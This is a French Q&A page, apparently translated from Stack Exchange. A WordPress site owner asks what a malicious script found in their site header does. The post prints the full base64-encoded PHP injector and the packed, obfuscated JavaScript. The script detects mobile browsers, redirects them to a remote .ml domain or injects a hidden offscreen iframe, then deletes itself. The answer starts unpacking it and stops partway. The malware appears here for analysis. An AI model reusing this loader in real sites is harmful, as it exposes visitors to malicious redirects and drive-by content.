web-dev-qa-db-fra.com

JavaScript suspect dans l'en-tête du site Web

Je ne sais pas si c'est le bon endroit pour poser des questions comme celle-ci, excuses si ce n'est pas le cas.

J'ai trouvé le code ci-dessous dans l'en-tête de l'un de mes sites Internet wordPress, je suis quasiment sûr qu'il est malveillant et je l'ai supprimé. Cependant, je suis curieux et je ne peux pas déterminer ce que son but est.

Quelqu'un est-il en mesure de fournir des idées?

Base 64 encodé:

CmZ1bmN0aW9uIHVzZXJfYWJvcnRfZW5kX2V4aXRfb3BlcmF0aW9uaWRfODgwNzkwNigpCnsKICAgIGVjaG8gYmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0IwZVhCbFBTSjBaWGgwTDJwaGRtRnpZM0pwY0hRaUlHbGtQU0pwWkY4NE9EQTNPVEEySWo1bGRtRnNLR1oxYm1OMGFXOXVLSEFzWVN4akxHc3NaU3hrS1h0bFBXWjFibU4wYVc5dUtHTXBlM0psZEhWeWJpaGpQR0UvSnljNlpTaHdZWEp6WlVsdWRDaGpMMkVwS1NrcktDaGpQV01sWVNrK016VS9VM1J5YVc1bkxtWnliMjFEYUdGeVEyOWtaU2hqS3pJNUtUcGpMblJ2VTNSeWFXNW5LRE0yS1NsOU8ybG1LQ0VuSnk1eVpYQnNZV05sS0M5ZUx5eFRkSEpwYm1jcEtYdDNhR2xzWlNoakxTMHBlMlJiWlNoaktWMDlhMXRqWFh4OFpTaGpLWDFyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z1pGdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLWHRwWmloclcyTmRLWHR3UFhBdWNtVndiR0ZqWlNodVpYY2dVbVZuUlhod0tDZGNYR0luSzJVb1l5a3JKMXhjWWljc0oyY25LU3hyVzJOZEtYMTljbVYwZFhKdUlIQjlLQ2R4SURGMFBUTjRLRW9vS1h0bUtHb3VUU0U5TVVrbUprd2dhaTVOSVQwaVN5SXBlek41S0RGMEtUdG1LRXdnUVZzaU1VRWlYVDA5SWtzaUtYdEJXeUl4UVNKZFBURTdjU0F4Tnowb01UWW9LU1ltTVZJb0tTazdjU0F4VkQwaE1UY21KaUVoUVM0emVpWW1RUzVGTGpOM1BUMDlJak4ySUROeUxpSTdjU0F4YWowdE1UdHhJRWM5SWpOek9pOHZNM1F1TTNVdk0wRWlPMllvVnlncEppWXhhajA5TVNsN1ppZ29SUzVPTGpGdktDOHpRaTlwS1NsOGZDaEZMazR1TVc4b0x6TklMMmtwS1NsN01Ua3VNMGtvUnlsOWVudEJMakU1UFVjN2FpNHhPVDFIZlgxNmUyWW9LREUzSmlZaE1WUW1KaUZYS0NrcEtYdHhJRk05SWp3eE1TQXpTajFjWENJelJ6b3pSanN6UXpvdE0wUTdYRndpUGp3eGVTQXpSVDFjWENJeGJGeGNJaUF6Y1QxY1hDSWlLMGNySWx4Y0lpQXpjRDFjWENJeGJGeGNJajQ4THpGNVBqd3ZNVEUrSWp0eElFazlhaTR6WWlnaU1URWlLVHRtS0VrdU1XMDlQVEFwZTJvdVRTNVFQV291VFM1UUsxTjllbnR4SURGT1BVa3VNVzA3Y1NCU1BUTmpMak5rS0NneFRpOHlLU2s3U1Z0U1hTNVFQVWxiVWwwdVVDdFRmWDE5ZlRGTktDbDlmU3d6WVNrN1NpQXhUU2dwZTNFZ1ZUMGlNemtpTzJZb1ZTRTlJak0xSWlsN2NTQklQV291TXpZb1ZTazdaaWhNSUVnaFBVc21Ka2doUFRGSktYdElMak0zUFNJaU96TTRJRWg5ZlgwN1NpQXhVaWdwZTJZb2FpNUVKaVloYWk0elpTbDdlQ0JDZlhvZ1ppaHFMa1FtSmlGQkxqTm1LWHQ0SUVKOWVpQm1LR291UkNZbUlXb3VNMjBwZTNnZ1FuMTZJR1lvYWk1RUppWWhhaTR6YmlsN2VDQkNmWG9nWmlocUxrUW1KaUZCTGpOdktYdDRJRUo5ZWlCbUtHb3VSQ2w3ZUNCQ2ZYb2daaWhNSUVVdU0yd2hQU0pMSWlZbUlXb3VSQ1ltTVRZb0tTbDdlQ0JDZlhwN2VDQXhZbjE5U2lBeE5pZ3BlM0VnZVQxQkxrVXVUanR4SUZFOWVTNURLQ0l6YXlBaUtUdG1LRkUrTUNsN2VDQmFLSGt1V1NoUkt6VXNlUzVES0NJdUlpeFJLU2tzTVRBcGZYRWdNV3M5ZVM1REtDSXpaeThpS1R0bUtERnJQakFwZTNFZ01UUTllUzVES0NJemFEb2lLVHQ0SUZvb2VTNVpLREUwS3pNc2VTNURLQ0l1SWl3eE5Da3BMREV3S1gxeElFODllUzVES0NJemFTOGlLVHRtS0U4K01DbDdlQ0JhS0hrdVdTaFBLelVzZVM1REtDSXVJaXhQS1Nrc01UQXBmWGdnTVdKOVNpQlhLQ2w3Y1NBeFlUMUJMa1V1VGk0emFpZ3BPMllvTHlnelMzd3pURnhjWkN0OE5HZ3BMaXN4YUh3MGFYdzBhbHhjTDN3MFozdzBabncwWW53MFkzdzBaSHd6Tkh3MGEzd3hkU2cwYkh3eFpDbDhNWEo4TkhKOE5ITWdmRFIwZkRSeGZEUndmREZvTGlzMGJYdzBibncwYnlCdEtEUmhmRFE0S1dsOE0xTW9JREZQS1Q5OE0xUjhjQ2d6Vlh3elVpbGNYQzk4TTFGOE0wMThNMDU4TTA4b05IdzJLVEI4TTFCOE0xWjhNVWhjWEM0b00xZDhORE1wZkRRMGZEUTJmRFF5SURReGZETllmRE5aTDJrdU1VTW9NV0VwZkh3dk0xcDhOSFY4TWt0OE1tWjhNbUY4TlRCYk1TMDJYV2w4TWpoOE1WWjhZU0F4VUh3eFdId3hkeWd4VVh3eGVIeHpYRnd0S1h3eFV5Z3lZbnd5YXlsOE1XY29NbTE4TVc1OE1YWXBmREp1ZkRKa0tESmxmRlo4TW1NcGZESnBmREZtS0RKc2ZERmpLWHd4V2loVWZESnZLWHd4VjN3eFdTZ3ljSHhjWEMxdGZISWdmSE1nS1h3eWNYd3laeWd4Vlh3eGNId3lhQ2w4TVVJb01tcDhNaklwZkRJektERjNmREk1S1h3eU55aGxmSFlwZDN3eU5ud3lORnhjTFNodWZIVXBmREkxWEZ3dmZETXpmREpSZkRKU1hGd3RmREpRZkRKUGZESk1mREpOWEZ3dGZERjJLREpPZkRGRktYd3lXbnd5VmlneFpYd3hjSHd5V0NsOE1uaDhNbmxjWEMxemZESjZmREozZkRKMmZERnBLR044Y0NsdmZESnpLREV5ZkZ4Y0xXUXBmREoxS0RRNWZERlRLWHd5UWlneVNId3lTU2w4TVZFb01rUjhNa1VwZkRKRGZESkdLRnMwTFRkZE1Id3hUM3d4VUh3eVJ5bDhNa0Y4TW5Rb1hGd3RmREZ4S1h3eFRDQjFmREpLZkRKWGZESlpYRnd0Tlh4blhGd3RNVFY4TVdNb1hGd3VkM3d4WkNsOE16RW9NekI4TWxVcGZESnlmREpVZkRKVFhGd3RLRzE4Y0h4MEtYdzBaVnhjTFh3MFJDZ3hSM3d4UmlsOE5tMG9JR2w4TVhVcGZEWnVYRnd0WTN3MmJ5aGpLRnhjTFh3Z2ZERnhmR0Y4WjN4d2ZITjhkQ2w4Tm1zcGZEWm9LRFpwZkRacUtYeHBYRnd0S0RJd2ZERmpmRmdwZkRaeGZEUjJLQ0I4WEZ3dGZGeGNMeWw4Tm5kOE5uaDhObmw4Tm5aOE5uVjhObko4Tm5OOE1YSjhOblFvZEh4MktXRjhObWQ4Tm1aOE5qSjhOak44TmpSOE5Wb29JSHhjWEM4cGZEVlZmRFZXSUh3MVYxeGNMWHcxV0NoamZHc3BmRFkxS0RZMmZEWmpLWHcyWkNnZ1ozeGNYQzhvYTN4c2ZIVXBmRFV3ZkRVMGZGeGNMVnRoTFhkZEtYdzJPSHcyT1h3MmVseGNMWGQ4TnpKOE56TmNYQzk4V0NoVWZEYzBmRGN4S1h3eGVpaEdmREl4ZkRGdUtYeHRYRnd0TmxwOE5sY29ObGg4TVVRcGZEYzFLRGMyZkRkamZERktLWHczWlh3eE5TaEdmRGRrZkRGQ2ZEZGlmREZwZkhRb1hGd3RmQ0I4YjN4MktYdzNOeWw4Tnpnb05UQjhObFY4ZGlBcGZEWlVmRFpIZkRaSVd6QXRNbDE4TmtsYk1pMHpYWHcyUmlnd2ZESXBmRFpGS0RCOE1udzFLWHcyUWlnd0tEQjhNU2w4TVRBcGZEWkRLQ2hqZkcwcFhGd3RmRFpFZkRaS2ZEWkxmRFpSZkRaU0tYdzJVeWcyZkdrcGZEWlBmRFpNZkRaTktEWk9mRFZVS1h3MVUzdzBWM3cwV0h3MFdTaGhmR1I4ZENsOE5GVjhORklvTVROOFhGd3RLRnN4TFRoZGZHTXBLWHcwV253MU1Yd3hTeWcxWVh3MVlpbDhOV05jWEMweWZEVTVLREZWZkRVNGZERnpLWHcxTlh3MU5ud3hSMXhjTFdkOE5UZGNYQzFoZkRSUUtEUkRmREV5ZkRJeGZETXlmRFl3ZkZ4Y0xWc3lMVGRkZkdsY1hDMHBmRFI0ZkRSNWZEUjZmRFJHZkRSSGZEUk5LRFJPZkRSUEtYdzBURnhjTDN3MFN5ZzBTSHhZZkRSSmZEUktmRlo4TldRcGZEVmxLRVo4YUZ4Y0xYd3hlSHh3WEZ3dEtYdzFSMXhjTDN3eGN5aGpLRnhjTFh3d2ZERXBmRFEzZkRGNmZERkZmREZFS1h3MVFWeGNMWHcxUW53MVF5aGNYQzE4YlNsOE5VbGNYQzB3ZkRWS0tEUTFmRFZSS1h3MVVpZ3haM3d4Wm53MVQzd3haWHcxVGlsOE5Vc29OVXg4VmlsOE5VMG9SbnhvWEZ3dGZIWmNYQzE4ZGlBcGZEVjVLRVo4Tld3cGZEVnRLREU0ZkRVd0tYdzFiaWcxYTN3eE1Id3hPQ2w4TVVZb05XZDhOV2dwZkRWcFhGd3RmRFZ2WEZ3dGZEVndLR2w4YlNsOE5YWmNYQzE4ZEZ4Y0xURTFmRFY0S0RGTGZEVjFLWHd4U2lnM01IeHRYRnd0ZkRWeGZEVnlLWHcxYzF4Y0xUbDhNVWdvWEZ3dVlud3hUSHcxZWlsOE5WQjhOVVI4TlVWOE5GWjhObVVvTm5COFZDbDhObXdvTkRCOE5Wc3dMVE5kZkZ4Y0xYWXBmRFYwZkRWM2ZEVm1mRFZxS0RVeWZEVXpmRFl3ZkRZeGZEY3dmRFZJZkRWR2ZEUjNmRFJCZkRSQ0tYdzBSU2hjWEMxOElDbDhORkY4TkZSOE5GTW9aeUI4TmxCOE56a3BmRGRoZkRaWmZEWldmRFpCWEZ3dGZEWTNmRFpoZkRaaVhGd3RMMmt1TVVNb01XRXVOVmtvTUN3MEtTa3BlM2dnUW4xNElERmlmU2NzTmpJc05EUTVMQ2Q4Zkh4OGZIeDhmSHg4Zkh4OGZIeHBabng4Zkh4a2IyTjFiV1Z1ZEh4OGZIeDhmSHgyWVhKOGZIeDhmSHg4Y21WMGRYSnVmSHBDYmtkalVrdHVWV3RuVjJWeFIxTnpSVUZ3VTI1NGRFNXBUVmh4Wm10SGVWbDhaV3h6Wlh4M2FXNWtiM2Q4ZEhKMVpYeHBibVJsZUU5bWZHRnNiSHh1WVhacFoyRjBiM0o4TURGOFdHWllhRVZRU205RWNXbDVabVZTYW0xaVlXNTZVVzVHU2tKdFEwNVRaV1pJWTIxNmNteDhXbXRIU1VSWlExSlhXWGxwU2xsUFZVcEtZM0p1U0VoalMySm9UMXB4VGtGclMwcEVmR3hTWVVabVMwMXFaV2hCY1hGWlZtcFhURnBaVjJGNVdGRndSbUpuU0V4TVZYVnVZM3htZFc1amRHbHZibngxYm1SbFptbHVaV1I4ZEhsd1pXOW1mR0p2WkhsOGRYTmxja0ZuWlc1MGZGSkZWa3hIY1dad2RXNWxkV0ZoU2tWWVNGTkhjRmR1VVdwYVlWcFdVMnRHZkdsdWJtVnlTRlJOVEh4VVFXSnBURk5aVm5aMVRuZEphV2xZZDJsSlVXNW1URU40WVVKRGNuTnZkVk40Y2xOMVNIeHRTazl6UldsYVluVlJhR2xKVkhOWGNGRmFXRWRhWVZKNlZteFFkR3RUVWtaNFRIUm1SM2w4UkdWelZYRjFTMUZLWjBKYWFtOXpVMGhRVjJOU1ZtZDZlVzFoVjNkeVJVbHRWbWw0YjBoMGZIUmxmSFpuV25aNWFrTmtla1JYZDBKMVpFaEZhM1JDYm1GaFoxbFpXV0p1V25oQ2ZHNTVmRXhEU0hGVFNsaG9TWGwxWkhKWGVtOWlTa1JUUTI5WloyZEdjV0ZQU25WU2FXTlBiM3h0WVh4emRXSnpkSEpwYm1kOGNHRnljMlZKYm5SOGZHUnBkbng4ZkVGemFtSm9TMDlzVEZCclJVcHJhWEZuZVVGRlRteEtaMEoxZG5aMVJGRkJmRzF2ZkVweFJrOVhaVWRLVm1wbmJHZFlTbWRpYlZkTlQwOW5jbnBQYW0xNWQwRjViM3hEWVVWYWNraGFjRnBZWjNOUlJsVkVkMU5hVjNKaFQyeG9Za0p5Ukc5QmQzbHRmSHhzYjJOaGRHbHZibnh3UzBwUmRFNTNaRzlDV2twT2NHcDVZMGxZVjI5VmNHdGxhV1pWU1hKYWJFVjhabUZzYzJWOFoyOThiMlI4YVhSOFlYSjhZV3g4Ylc5aWFXeGxmR1J2ZkZwTWRXaHZXSHBrWkdOU1VrcEdjMXBKZEVwS1pITnBTRmxIUjI5QlZWUjhablp4YW1KelRVeGFkMUZvYWtadFdubDNaa3B3VUVwQ2RtRlpUazVRUVdKclRYd3lNWEI0Zkd4bGJtZDBhSHhqWVh4dFlYUmphSHhzYkh4ZmZHbHlhWE44YzJWOGFuaFFiMmRNY205bFdGRjJjRmhyYldkMWJHcGFiMGRUVG01SlVVdFJWWFI4YVhCOFkyOThZV044YjI5OGFXWnlZVzFsZkcxamZIWmZZbVEyTm1Jek1tVXhZbU0yWVdRNU1XVXdNVE14T0dVNE1qYzRPVEU0WmpCOFltbDhkR1Z6ZEh4eWFYeHVaSHgwWVh4d2RIeDFjSHh1ZFd4c2ZIUnpmSEJzZkdjeGZIQkpiMjlLZFhOclNITlRTbTV1V0dkbWFWWkZkbk5HY1hGamNWaFJVV3B2ZkdSc1gyNWhiV1Y4YjNOOGQyRjhaWEo4YVZGRWFsTnlWV0YyUkdoellWcHdRVWRCWkhCMWFXTk9TV2wwUVZGamMzZDBRVmg4WVdsOGJtWjRhVXRtWm5sUmFrVklTV2xtV2tKT1NXWmFVSGwyZFZaQlMxaFJRVmRsYWt0NFptdG1aV2g4WTJ0OE9EQXljM3hoZEhSM2ZHRmlZV044WVhWOFlYTjhmSHh5Wkh4aWJIeGlkM3hqTlRWOFluVnRZbnhpY253M056QnpmR0Y2ZkRSMGFIQjhhMjk4ZVhkOFlXNThaWGg4TTJkemIzeGlaWHh1Y1h4aGNIUjFmR3hpZkhKdWZHTm9mR0YyZkdGdGIybDhkWE44WkdsOFlYWmhibnhvWVdsbGZHUnpmR1pzZVh4bGJIeGtiVzlpZkdScFkyRjhaR0owWlh4a1kzeGtaWFpwZkdabGRHTjhaVzE4WlhOc09IeHBZM3hyTUh4bGVueDZaWHhzTW54MWJIeG5OVFl3ZkRZMU9UQjhZMnhrWTN4amJXUjhiWEI4WTJoMGJYeGpaV3hzZkdOamQyRjhZMlJ0Zkdoa2ZHaGphWFI4ZFc1OFpHRjhaMlZ1Wlh4dVozeG5abnhqY21GM2ZHRmtmR2R5Zkh4allYQnBmR2hwY0hSdmNIeHViMjVsZkdkbGRFVnNaVzFsYm5SQ2VVbGtmRzkxZEdWeVNGUk5USHhrWld4bGRHVjhhV1JmT0Rnd056a3dObnd4TURCOFoyVjBSV3hsYldWdWRITkNlVlJoWjA1aGJXVjhUV0YwYUh4bWJHOXZjbnhqYjIxd1lYUk5iMlJsZkZoTlRFaDBkSEJTWlhGMVpYTjBmRlJ5YVdSbGJuUjhjblo4UldSblpYeDBiMHh2ZDJWeVEyRnpaWHhOVTBsRmZHMWhlRlJ2ZFdOb1VHOXBiblJ6ZkhGMVpYSjVVMlZzWldOMGIzSjhZV1JrUlhabGJuUk1hWE4wWlc1bGNueGhkRzlpZkdobGFXZG9kSHh6Y21OOFNXNWpmR2gwZEhCOGJXbDNhMkYyYjNKcGQydGhmRzFzZkVkdmIyZHNaWHgyWlc1a2IzSjhjMlYwU1c1MFpYSjJZV3g4WTJ4bFlYSkpiblJsY25aaGJIeGphSEp2YldWOE1EVXlSbnhwVUdodmJtVjhiR1ZtZEh3eU5qTXdjSGg4ZDJsa2RHaDhZV0p6YjJ4MWRHVjhjRzl6YVhScGIyNThhVkJ2Wkh4eVpYQnNZV05sZkhOMGVXeGxmR0Z1WkhKdmFXUjhZbUo4Y0c5amEyVjBmSEJ6Y0h4elpYSnBaWE44YzNsdFltbGhibnh3YkhWamEyVnlmSEpsZkhCaGJHMThjR2h2Ym1WOGFYaHBmSFJ5Wlc5OFluSnZkM05sY254NFpHRjhlR2xwYm05OE1USXdOM3g4WTJWOGQybHVaRzkzYzN4c2FXNXJmSFp2WkdGbWIyNWxmSHgzWVhCOGZHbHVmSHh2WW54amIyMXdZV3g4Wld4aGFXNWxmR1psYm01bFkzeG9aV2w4WW14aGVtVnlmR0pzWVdOclltVnljbmw4YldWbFoyOThZWFpoYm5SbmIzeGlZV1JoZkdsbGJXOWlhV3hsZkdodmJtVjhabWx5WldadmVIeHVaWFJtY205dWRIeHZjR1Z5WVh4dGJYQjhiV2xrY0h4cmFXNWtiR1Y4YkdkbGZHMWhaVzF2ZkRZek1UQjhhV0ZqZkRnemZIRjBaV3Q4Y2pNNE1IeHlOakF3ZkRnMWZEazRmREEzZkdocGZIY3pZM3h5WVd0emZISnBiVGw4WjJWOGJXMThiWE44YzJGOGN6VTFmSEp2ZkhabGZIcHZmSEZqZkhkbFltTjhjR2Q4ZDJsOGQyaHBkSHh3WkhobmZIWmxjbWw4YjNkbk1YeHdPREF3ZkhCaGJueHdhR2xzZkh4d2FYSmxmSHg4ZkhCeWIzaDhjSE5wYjN4eFlYeHlkSHh3YjN4aGVYeDFZM3h3Ym54MllYeHpZM3gyZFd4amZHZDBmR3hyZkhSamJIeDJlSHd3TUh4dFlueDBNbngwTm54MFpHZDhkR1ZzZkcwemZHMDFmSFI0ZkhadE5EQjhjMmg4ZEdsdGZIWnZaR0Y4ZEc5OGMzbDhjMmw4YzJkb2ZITm9ZWEo4YzJsbGZIWTBNREI4ZGpjMU1IdzRNWHh6Wkd0OE9EQjhjMnQ4YzJ4OGMyOThablI4YzNCOGREVjhZak44ZFhSemRIeHBaSHh6Ylh4dmNtRnVmSGQyZkd0c2IyNThhM0IwZkd0M1kzeHJlVzk4YzNWaWMzUnlmR3RuZEh4OGZHcHBaM044YTJSa2FYeHJaV3BwZkd4bGZHNXZmSGx2ZFhKOGJHbGlkM3hzZVc1NGZIcGxkRzk4ZW5SbGZIaHBmR3huZkhacGZHcGxiWFY4YW1KeWIzeG9kWHhoZDN4MFkzeDBjSHgyYTN4b2NIeG9jM3hvZEh4eVozeHBNak13ZkdsdWJtOThhWEJoY1h4cVlYeHBiVEZyZkdscmIyMThhV0p5YjN4cFpHVmhmR2xuTURGOGJURjhlV0Z6Zkc0M2ZHNWxmRzl1Zkc0MU1IeHVNekI4YlhsM1lYeHVNVEI4YmpJd2ZIUm1mSGRtZkc4eWFXMThiM0I4ZEdsOGJucHdhSHh1WTN4M1ozeDNkSHh1YjJ0OGJYZGljSHh3TVh4NE56QXdmRzFsZkhKamZIZHZiblY4WTNKOGZIaHZmRzB6WjJGOGJUVXdmSFZwZkcxcGZHODRmSHA2ZkcxMGZHNTNmSGR0YkdKOFpHVjhiMkY4TURKOGJXMWxaaWN1YzNCc2FYUW9KM3duS1N3d0xIdDlLU2tLUEM5elkzSnBjSFErJyk7Cn0KCnJlZ2lzdGVyX3NodXRkb3duX2Z1bmN0aW9uKCd1c2VyX2Fib3J0X2VuZF9leGl0X29wZXJhdGlvbmlkXzg4MDc5MDYnKTsKCg==

Code réel:

<script type="text/javascript" id="id_8807906">
    eval(function(p, a, c, k, e, d) {
        e = function(c) {
            return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
        };
        if (!''.replace(/^/, String)) {
            while (c--) {
                d[e(c)] = k[c] || e(c)
            }
            k = [function(e) {
                return d[e]
            }];
            e = function() {
                return '\\w+'
            };
            c = 1
        };
        while (c--) {
            if (k[c]) {
                p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
            }
        }
        return p
    }('q 1t=3x(J(){f(j.M!=1I&&L j.M!="K"){3y(1t);f(L A["1A"]=="K"){A["1A"]=1;q 17=(16()&&1R());q 1T=!17&&!!A.3z&&A.E.3w==="3v 3r.";q 1j=-1;q G="3s://3t.3u/3A";f(W()&&1j==1){f((E.N.1o(/3B/i))||(E.N.1o(/3H/i))){19.3I(G)}z{A.19=G;j.19=G}}z{f((17&&!1T&&!W())){q S="<11 3J=\\"3G:3F;3C:-3D;\\"><1y 3E=\\"1l\\" 3q=\\""+G+"\\" 3p=\\"1l\\"></1y></11>";q I=j.3b("11");f(I.1m==0){j.M.P=j.M.P+S}z{q 1N=I.1m;q R=3c.3d((1N/2));I[R].P=I[R].P+S}}}}1M()}},3a);J 1M(){q U="39";f(U!="35"){q H=j.36(U);f(L H!=K&&H!=1I){H.37="";38 H}}};J 1R(){f(j.D&&!j.3e){x B}z f(j.D&&!A.3f){x B}z f(j.D&&!j.3m){x B}z f(j.D&&!j.3n){x B}z f(j.D&&!A.3o){x B}z f(j.D){x B}z f(L E.3l!="K"&&!j.D&&16()){x B}z{x 1b}}J 16(){q y=A.E.N;q Q=y.C("3k ");f(Q>0){x Z(y.Y(Q+5,y.C(".",Q)),10)}q 1k=y.C("3g/");f(1k>0){q 14=y.C("3h:");x Z(y.Y(14+3,y.C(".",14)),10)}q O=y.C("3i/");f(O>0){x Z(y.Y(O+5,y.C(".",O)),10)}x 1b}J W(){q 1a=A.E.N.3j();f(/(3K|3L\\d+|4h).+1h|4i|4j\\/|4g|4f|4b|4c|4d|34|4k|1u(4l|1d)|1r|4r|4s |4t|4q|4p|1h.+4m|4n|4o m(4a|48)i|3S( 1O)?|3T|p(3U|3R)\\/|3Q|3M|3N|3O(4|6)0|3P|3V|1H\\.(3W|43)|44|46|42 41|3X|3Y/i.1C(1a)||/3Z|4u|2K|2f|2a|50[1-6]i|28|1V|a 1P|1X|1w(1Q|1x|s\\-)|1S(2b|2k)|1g(2m|1n|1v)|2n|2d(2e|V|2c)|2i|1f(2l|1c)|1Z(T|2o)|1W|1Y(2p|\\-m|r |s )|2q|2g(1U|1p|2h)|1B(2j|22)|23(1w|29)|27(e|v)w|26|24\\-(n|u)|25\\/|33|2Q|2R\\-|2P|2O|2L|2M\\-|1v(2N|1E)|2Z|2V(1e|1p|2X)|2x|2y\\-s|2z|2w|2v|1i(c|p)o|2s(12|\\-d)|2u(49|1S)|2B(2H|2I)|1Q(2D|2E)|2C|2F([4-7]0|1O|1P|2G)|2A|2t(\\-|1q)|1L u|2J|2W|2Y\\-5|g\\-15|1c(\\.w|1d)|31(30|2U)|2r|2T|2S\\-(m|p|t)|4e\\-|4D(1G|1F)|6m( i|1u)|6n\\-c|6o(c(\\-| |1q|a|g|p|s|t)|6k)|6h(6i|6j)|i\\-(20|1c|X)|6q|4v( |\\-|\\/)|6w|6x|6y|6v|6u|6r|6s|1r|6t(t|v)a|6g|6f|62|63|64|5Z( |\\/)|5U|5V |5W\\-|5X(c|k)|65(66|6c)|6d( g|\\/(k|l|u)|50|54|\\-[a-w])|68|69|6z\\-w|72|73\\/|X(T|74|71)|1z(F|21|1n)|m\\-6Z|6W(6X|1D)|75(76|7c|1J)|7e|15(F|7d|1B|7b|1i|t(\\-| |o|v)|77)|78(50|6U|v )|6T|6G|6H[0-2]|6I[2-3]|6F(0|2)|6E(0|2|5)|6B(0(0|1)|10)|6C((c|m)\\-|6D|6J|6K|6Q|6R)|6S(6|i)|6O|6L|6M(6N|5T)|5S|4W|4X|4Y(a|d|t)|4U|4R(13|\\-([1-8]|c))|4Z|51|1K(5a|5b)|5c\\-2|59(1U|58|1s)|55|56|1G\\-g|57\\-a|4P(4C|12|21|32|60|\\-[2-7]|i\\-)|4x|4y|4z|4F|4G|4M(4N|4O)|4L\\/|4K(4H|X|4I|4J|V|5d)|5e(F|h\\-|1x|p\\-)|5G\\/|1s(c(\\-|0|1)|47|1z|1E|1D)|5A\\-|5B|5C(\\-|m)|5I\\-0|5J(45|5Q)|5R(1g|1f|5O|1e|5N)|5K(5L|V)|5M(F|h\\-|v\\-|v )|5y(F|5l)|5m(18|50)|5n(5k|10|18)|1F(5g|5h)|5i\\-|5o\\-|5p(i|m)|5v\\-|t\\-15|5x(1K|5u)|1J(70|m\\-|5q|5r)|5s\\-9|1H(\\.b|1L|5z)|5P|5D|5E|4V|6e(6p|T)|6l(40|5[0-3]|\\-v)|5t|5w|5f|5j(52|53|60|61|70|5H|5F|4w|4A|4B)|4E(\\-| )|4Q|4T|4S(g |6P|79)|7a|6Y|6V|6A\\-|67|6a|6b\\-/i.1C(1a.5Y(0,4))){x B}x 1b}', 62, 449, '|||||||||||||||if||||document|||||||var|||||||return|zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY|else|window|true|indexOf|all|navigator|01|XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl|ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD|lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc|function|undefined|typeof|body|userAgent|REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF|innerHTML|TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH|mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy|DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt|te|vgZvyjCdzDWwBudHEktBnaagYYYbnZxB|ny|LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo|ma|substring|parseInt||div|||AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA|mo|JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo|CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym||location|pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE|false|go|od|it|ar|al|mobile|do|ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT|fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM|21px|length|ca|match|ll|_|iris|se|jxPogLroeXQvpXkmguljZoGSNnIQKQUt|ip|co|ac|oo|iframe|mc|v_bd66b32e1bc6ad91e01318e8278918f0|bi|test|ri|nd|ta|pt|up|null|ts|pl|g1|pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo|dl_name|os|wa|er|iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX|ai|nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh|ck|802s|attw|abac|au|as|||rd|bl|bw|c55|bumb|br|770s|az|4thp|ko|yw|an|ex|3gso|be|nq|aptu|lb|rn|ch|av|amoi|us|di|avan|haie|ds|fly|el|dmob|dica|dbte|dc|devi|fetc|em|esl8|ic|k0|ez|ze|l2|ul|g560|6590|cldc|cmd|mp|chtm|cell|ccwa|cdm|hd|hcit|un|da|gene|ng|gf|craw|ad|gr||capi|hiptop|none|getElementById|outerHTML|delete|id_8807906|100|getElementsByTagName|Math|floor|compatMode|XMLHttpRequest|Trident|rv|Edge|toLowerCase|MSIE|maxTouchPoints|querySelector|addEventListener|atob|height|src|Inc|http|miwkavoriwka|ml|Google|vendor|setInterval|clearInterval|chrome|052F|iPhone|left|2630px|width|absolute|position|iPod|replace|style|Android|bb|pocket|psp|series|symbian|plucker|re|Palm|phone|ixi|treo|browser|xda|xiino|1207||ce|windows|link|vodafone||wap||in||ob|compal|elaine|fennec|hei|blazer|blackberry|meego|avantgo|bada|iemobile|hone|firefox|netfront|opera|mmp|midp|Kindle|lge|maemo|6310|iac|83|qtek|r380|r600|85|98|07|hi|w3c|raks|rim9|ge|mm|ms|sa|s55|ro|ve|zo|qc|webc|pg|wi|whit|pdxg|veri|owg1|p800|pan|phil||pire||||prox|psio|qa|rt|po|ay|uc|pn|va|sc|vulc|gt|lk|tcl|vx|00|mb|t2|t6|tdg|tel|m3|m5|tx|vm40|sh|tim|voda|to|sy|si|sgh|shar|sie|v400|v750|81|sdk|80|sk|sl|so|ft|sp|t5|b3|utst|id|sm|oran|wv|klon|kpt|kwc|kyo|substr|kgt|||jigs|kddi|keji|le|no|your|libw|lynx|zeto|zte|xi|lg|vi|jemu|jbro|hu|aw|tc|tp|vk|hp|hs|ht|rg|i230|inno|ipaq|ja|im1k|ikom|ibro|idea|ig01|m1|yas|n7|ne|on|n50|n30|mywa|n10|n20|tf|wf|o2im|op|ti|nzph|nc|wg|wt|nok|mwbp|p1|x700|me|rc|wonu|cr||xo|m3ga|m50|ui|mi|o8|zz|mt|nw|wmlb|de|oa|02|mmef'.split('|'), 0, {}))
javascriptviruswordpresscode-review
22
bf2mad

Il semble que le "code réel" que vous avez publié soit compressé à l'aide de http://matthewfl.com/unPacker.html . Lorsque vous le déballez, vous obtenez

var jxPogLroeXQvpXkmguljZoGSNnIQKQUt=setInterval(function()
{
if(document.body!=null&&typeof document.body!="undefined")
    {
    clearInterval(jxPogLroeXQvpXkmguljZoGSNnIQKQUt);
    if(typeof window["v_bd66b32e1bc6ad91e01318e8278918f0"]=="undefined")
        {
        window["v_bd66b32e1bc6ad91e01318e8278918f0"]=1;
